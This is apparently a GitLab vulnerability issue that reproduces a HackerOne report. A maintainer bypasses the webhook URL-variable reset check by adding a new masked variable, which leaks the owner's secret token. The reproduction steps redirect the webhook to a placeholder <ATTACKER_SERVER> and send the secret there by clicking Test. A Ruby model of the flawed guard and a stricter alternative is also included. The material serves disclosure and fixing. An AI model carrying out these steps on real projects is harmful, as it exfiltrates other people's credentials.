Maintainer can leak masked webhook secrets by adding a new parameter to the webhook URL to bypass the newly added validation logic

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1871136 by 0xn3va on 2023-02-12, assigned to @rshambhuni:

Report

Summary

There is a vulnerability #385118 (closed) that was fixed and disclosed recently. The fix adds an extra check in case the URL changes:

https://gitlab.com/gitlab-org/gitlab/-/commit/7f34991ae36f1804610ba9980e31191394c8b208

```ruby
# ...
  before_validation :reset_url_variables, unless: ->(hook) { hook.is_a?(ServiceHook) }
# ...
  def reset_url_variables
    self.url_variables = {} if url_changed? && !encrypted_url_variables_changed?
  end
```

However, reset_url_variables will return false if the URL variables have also been changed. This allows bypassing the check by adding a new variable to the modified URL.

Steps to reproduce

As a project owner

  1. Create a project
  2. Add another user to the project as a maintainer
  3. Go to Settings > Webhooks
  4. Put the URL https://example.com?token=secret-token
  5. Click to add a mask
  6. Add the value secret-token with the replacement TOKEN
  7. Click save for the webhook

As a maintainer

  1. Open the project
  2. Go to Settings > Webhooks
  3. Click edit on the webhook
  4. Edit the URL to your controlled server like this: https://<ATTACKER_SERVER>?token={TOKEN}&a=aaaaa
  5. Add the value aaaaa with the replacement A
  6. Save the webhook
  7. Now click Test to send a request
  8. Check your server logs; it will contain the secret in plain text
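The guard quoted above and the maintainer steps, modelled in a small Ruby stand-in (an added example, not GitLab's code or the reporter's): the lenient guard keeps the stored TOKEN value once a second variable is added in the same save, while an assumed stricter policy keeps only variables entered in that edit. HookStandIn, run_scenario and the "strict" policy are illustrative assumptions, not GitLab's actual fix.

```ruby
# Added example, not GitLab's code: a stand-in for the hook model reproducing the
# reset_url_variables guard quoted above; class/method names and the stricter
# "submitted-only" policy are assumptions, not GitLab's actual fix.
class HookStandIn
  def initialize(url:, url_variables:, policy: :lenient)
    @url, @url_variables, @policy = url, url_variables.dup, policy
    @saved_url, @saved_vars = url, url_variables.dup  # last persisted state
    @submitted = {}                                   # variables entered in this edit
  end

  # Stand-ins for ActiveRecord's url_changed? / encrypted_url_variables_changed?
  def url_changed?;           @url != @saved_url;           end
  def url_variables_changed?; @url_variables != @saved_vars; end

  def url=(value); @url = value; end
  def add_variable(name, value); @url_variables[name] = @submitted[name] = value; end

  # Guard as quoted from the commit: editing the variables in the same save as
  # the URL makes the condition false, so every previously stored secret is kept.
  def reset_url_variables_lenient
    @url_variables = {} if url_changed? && !url_variables_changed?
  end

  # Assumed stricter rule: when the URL changes, only variables (re)entered in
  # this edit survive; values merely carried over from the old URL are dropped.
  def reset_url_variables_strict
    @url_variables = @submitted.dup if url_changed?
  end

  def save
    @policy == :strict ? reset_url_variables_strict : reset_url_variables_lenient
    @saved_url, @saved_vars, @submitted = @url, @url_variables.dup, {}
    self
  end

  # Render the URL as a delivery would, substituting {NAME} placeholders;
  # placeholders with no stored variable are left as-is.
  def interpolated_url
    @url.gsub(/\{([A-Za-z]+)\}/) { |m| @url_variables.fetch(Regexp.last_match(1), m) }
  end
end

# The maintainer's edit from the report: new host plus a new variable in one save.
def run_scenario(policy)
  hook = HookStandIn.new(url: "https://example.com?token={TOKEN}",
                         url_variables: { "TOKEN" => "secret-token" }, policy: policy)
  hook.url = "https://other-host.invalid?token={TOKEN}&a={A}"
  hook.add_variable("A", "aaaaa")
  hook.save.interpolated_url
end
```

With the lenient guard the rendered delivery URL still carries secret-token; with the strict policy the stale TOKEN placeholder is left unfilled while the newly entered variable is kept.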

Impact

This vulnerability allows an attacker with the Maintainer role to leak webhook secrets.

What is the current bug behavior?

Adding or deleting a new secret does not reset the previously saved ones

What is the expected correct behavior?

Adding or deleting a new secret resets the previously saved ones

Relevant logs and/or screenshots

Screen_Recording_2023-02-12_at_12.55.50.mov

Output of checks

This bug happens on GitLab.com
